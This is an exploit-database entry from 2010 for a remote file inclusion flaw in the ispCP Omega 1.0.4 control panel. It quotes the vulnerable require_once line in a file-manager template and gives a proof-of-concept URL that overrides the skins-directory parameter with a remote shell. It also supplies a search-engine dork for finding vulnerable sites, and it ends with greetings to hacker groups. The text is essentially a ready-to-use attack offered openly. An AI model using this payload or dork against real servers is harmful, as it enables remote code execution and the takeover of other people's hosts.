ispCP Omega <= 1.0.4 Remote File Include Vulnerability

EDB-ID: 11681	CVE: N/A	OSVDB-ID: 62852
Author: cr4wl3r	Published: 2010-03-10	Verified:
Exploit Code:	Vulnerable App:

[+] ispCP Omega <= 1.0.4 Remote File Include Vulnerability
[+] Discovered By: cr4wl3r
[+] Download: http://isp-control.net/
[+] Dork: "Powered by ispCP Omega"
[+] Code in [ispcp-omega-1.0.4/gui/tools/filemanager/skins/mobile/admin1.template.php]
[x] <?php require_once($net2ftp_globals["application_skinsdir"] . "/blue/admin1.template.php"); ?>
[+] PoC: [path]/tools/filemanager/skins/mobile/admin1.template.php?net2ftp_globals[application_skinsdir]=[Shell]
[+] Greetz and thanks to:
[!] str0ke [milw0rm.com]
[!] r0073r, 0x1D [inj3ct0r.com]
[!] opt!x hacker [morrocan hacker]
[!] xoron [turkish hacker]
[!] irvian, cyberlog, [sekuritionline.net]
[!] EA ngel, basix, angky_tatoki, doniskaynet, panteto [manadocoding.net]
[!] boom3rang [khg-cr3w.org]

Comments

ispCP Omega <= 1.0.4 Remote File Include Vulnerability

Rating

No comments so far